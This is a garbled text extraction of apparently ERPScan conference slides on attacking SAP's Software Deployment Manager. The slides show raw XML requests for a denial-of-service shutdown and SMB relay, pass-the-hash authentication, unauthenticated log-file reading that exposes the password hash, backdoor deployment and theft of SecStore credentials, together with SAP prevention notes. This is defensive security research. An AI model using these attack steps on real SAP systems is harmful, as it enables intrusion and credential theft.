SAP is the most popular business application with more than two hundred forty thousand installations all over the world. But people spend enormous amounts of money to install it and then forget about security. However, in ERP systems, all business processes are performed, all critical information is stored like finances, HR, clients. Not to care about the security of this data is not very sensible.
SAP NetWeaver Development Infrastructure is a complex item. It combines the characteristics and advantages of local development environments with a server-based development landscape. All this stuff centrally provides opportunities to support the software, implement new features, manage lifecycle of a product, etc. So, the main aim is to control deployment of components in the system landscape in a standardized manner.
The key component in DI scheme is Software Deployment Manager (SDM). It is directly related to the production systems, that is why it is so critical.
The presentation describes special features of SDM and provides several SDM attack scenarios along with the ways to prevent them.
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server
1. Invest
in
security
to
secure
investments
Injec&ng
evil
code
in
your
SAP
J2EE
systems:
Security
of
SAP
So<ware
Deployment
Server
Dmitry
Chastukhin.
Director
of
SAP
pentest/
research
team
ERPScan
2. About
ERPScan
• The
only
360-‐degree
SAP
Security
solu&on
-‐
ERPScan
Security
Monitoring
Suite
for
SAP
• Leader
by
the
number
of
acknowledgements
from
SAP
(
150+
)
• 60+
presentaDons
key
security
conferences
worldwide
• 25
Awards
and
nominaDons
• Research
team
-‐
20
experts
with
experience
in
different
areas
of
security
• Headquarters
in
Palo
Alto
(US)
and
Amsterdam
(EU)
2
3. SAP
Вставьте
рисунок
на
слайд,
скруглите
верхний
левый
и
нижний
правый
угол
(Формат
–
Формат
рисунка),
добавьте
контур
(оранжевый,
толщина
–
3)
3
• The
most
popular
business
applica&on
• More
than
250000
customers
worldwide
• 83%
Forbes
500
companies
run
SAP
• Main
system
–
ERP
• 3
Plaporms
- NetWeaver
ABAP
- NetWeaver
J2EE
- BusinessObjects
4. SAP
insecurity
Espionage
• Stealing
financial
informa&on
• Stealing
corporate
secrets
• Stealing
supplier
and
customer
lists
• Stealing
HR
data
Fraud
• False
transac&ons
• Modifica&on
of
master
data
Sabotage
• Denial
of
service
• Modifica&on
of
financial
reports
• Access
to
technology
network
(SCADA)
by
trust
rela&ons
4
5. 5
More
than
2800
in
total
Source:
SAP
Security
in
Figures
0
100
200
300
400
500
600
700
800
900
2001
2002
2003
2004
2005
2006
2007
2008
2009
2010
2011
2012
2013
2014
SAP
vulnerabiliDes
6. Is
it
remotely
exploitable?
6
>
5000
non-‐web
SAP
services
exposed
in
the
world
including
Dispatcher,
Message
Server,
Sap
Host
Control,
etc.
sapscan.com
7. What
about
other
services?
0
1
2
3
4
5
6
7
8
9
SAP Dispatcher SAP MMC SAP Message Server SAP HostControl SAP ITS Agate SAP Message Server
httpd
7
Source:
SAP
Security
in
Figures
8. • SAP
NetWeaver
ABAP
• SAP
NetWeaver
J2EE
– SAP
Portal
– SAP
Solu&on
Manager
– SAP
NetWeaver
Development
Infrastracture
(NWDI)
• SAP
BusinessObjects
• SAP
HANA
Extended
Applica&on
Services
• SAP
SUP
• SAP
Fiori
8
SAP
ApplicaDon
server’s
9. • Design
Time
Repository
(DTR)
• Component
Build
Service
(CBS)
• Change
Management
Service
(CMS)
• So<ware
Landscape
Directory
(SLD)
/
NS
• So<ware
Deployment
Manager
(SDM)
9
SAP
NetWeaver
development
infrastructure
16. So^ware
Deployment
Manager
• Single
interface
for
the
deployment
• Deploy
apps
(*.ear,
*.war,
*.sda)
• Implement
custom
patches
16
17. SDM
server
• Different
server
modes
– standalone
– integrated
• Only
one
user
at
&me
• Only
hardcoded
admin
user
• Three
ports:
– 50017
–
Admin
Port
– 50018
–
GUI
Port
– 50019
–
H‚p
Port
17
18. SDM
client
• Browsing
the
distribu&on
of
deployed
components
• Deploying
and
undeploying
• Log
viewing
18
19. SDM
a_ack
intro
• SAP
infrastructure
includes
many
Java
services
• Almost
all
Java
stuff
uses
UME
• Universal
user
with
a
password
• Only
one
user
at
a
&me
• Ability
to
deploy
evil
code
=>
plus,
see
1st
item
19
21. SDM
a_ack
intro
• SAP
has
its
own
SAP
Java
Virtual
Machine
(JVM)
• Java
6
has
A‚ach
API
• A‚ach
to
another
running
JVM
• Intercept
and
modify
calls
21
22. A_ack
SAP
SDM.
DoS
• If
a‚acker
uses
an
incorrect
password
3
&mes,
the
server
will
shutdown
automa&cally
• Also,
if
you
send
this
request,
you
can
shutdown
the
SDM
server
manually:
[10 spaces]56<?xml version="1.0"?>
<ShutDownRequest></ShutDownRequest>
22
23. A_acking
SAP
SDM.
SMB
relay
Packed:
[10 Spaces]<?xml version="1.0"?>
<FileAccessRequest f="ip_addrblabla"> </
FileAccessRequest>
An
old
trick,
but
some&mes
it’s
very
useful
23
24. PrevenDon
24
•
Install
note
1724516
•
Enable
the
security
features
of
SDM
•
SDM
server
and
SDM
client
need
to
be
updated
h‚ps://websmp205.sap-‐ag.de/~sapidb/012006153200000493902012E/
SDM_EnablingSecurity.pdf
25. From
Nobody
to
Administrator
Now,
I
will
show
an
interes0ng
a2ack
Compromise
Some
SAP
Services
Compromise
SAP
SDM
Compromise
SAP
Server
OS
Compromise
SAP
25
26. SDM
authenDcaDon
abuse
• OK.
Let’s
see
how
authen&ca&on
in
SDM
works:
– user
enters
password
– hash
is
calculated
locally
on
client
– password
hash
is
sent
to
server
– hash
is
compared
to
hash
from
configura&on
file
Pass
the
hash
a_ack
here!
26
30. A_ack
on
SAP
SDM
Read
sdmrepository.sdc
Get
password
hash
Use
hash
as
password
to
authen&cate
on
SDM
server
Deploy
backdoor
on
SAP
Server
PROFIT!
30
31. File
read
•
OS
command
execu&on
through
CTC
(Notes
1467771,
1445998
)
•
XML
External
En&&es
(Note
1619539)
•
Directory
Traversal
(Note
1630293
)
•
Through
MMC
file
read
func&on
(Notes
927637
and
1439348)
We
have
something
new
for
u
J
31
32. SAP
Log
Viewer
standalone
• Open
ports:
26000
(NI),
1099
(RMI),
5465
(Socket)
• You
can:
– View
log
on
local
server
– View
log
on
remote
server
– Register
file
as
log
file
Read
log
file
without
authenDcaDon!
32
33. SAP
Log
Viewer
standalone
A_ack
is
pre_y
easy
Connect
to
LogViewer
standalone
Server
Register
sdmrepository.sdc
file
as
log
file
Read
it
33
42. PrevenDon
42
•
Install
Note
1724516,
1685106
•
Enable
the
security
features
of
SDM
•
SDM
server
and
SDM
client
need
to
be
updated
h‚ps://websmp205.sap-‐ag.de/~sapidb/012006153200000493902012E/
SDM_EnablingSecurity.pdf
43.
“The
So=ware
Deployment
Manager
(SDM)
uses
the
database
connec0on
informa0on,
the
J2EE
Engine
administrator
user
and
password
from
the
secure
storage
in
the
file
system,
to
connect
to
the
J2EE
Engine
and
perform
tasks
such
as
so=ware
deployment
and
undeployment”.
h‚p://help.sap.com/saphelp_nw70ehp1/helpdata/en/3d/
2e104202795e33e10000000a155106/content.htm
Wow!
J2EE
Engine
administrator
user
and
password
Where
is
all
this
stuff
located?
SAP
SecStore
43
44. SAP
SecStore
“By
default,
the
J2EE
Engine
stores
secure
data
in
the
file
usr
sap<SID>SYSglobalsecuritydataSecStore.proper0es
in
the
file
system”.
“The
J2EE
Engine
uses
the
SAP
Java
Cryptography
Toolkit
to
encrypt
the
contents
of
the
secure
store
with
the
tripleDES
algorithm”.
h‚p://help.sap.com/saphelp_nw70ehp1/helpdata/en/3d/
2e104202795e33e10000000a155106/content.htm
OK.
Let’s
try
to
read
SecStore.proper0es
44
45. SAP
SecStore
• We
can
execute
any
OS
command
(we
have
our
backdoor)
• We
know
the
SAP
J2EE
Engine
stores
the
database
user
SAP<SID>DB;
its
password
is
here:
usrsap<SID>SYSglobalsecuritydataSecStore.properties
• It’s
all
that
we
need
45
51. SAP
Guides
It’s
all
in
your
hands
Regular
security
assessments
ABAP
code
review
Monitoring
technical
security
SegregaDon
of
DuDes
Security
events
monitoring
Conclusion
It
is
possible
to
protect
yourself
from
these
kinds
of
issues,
and
we
are
working
close
with
SAP
to
keep
customers
secure
52. Future
work
I'd
like
to
thank
SAP's
Product
Security
Response
Team
for
the
great
coopera0on
to
make
SAP
systems
more
secure.
Research
is
always
ongoing,
and
we
can't
share
all
of
it
today.
If
you
want
to
be
the
first
to
see
new
a2acks
and
demos,
follow
us
at
@erpscan
and
a2end
future
presenta0ons:
52
web:
www.erpscan.com
e-‐mail:
info@erpscan.com,
sales@erpscan.com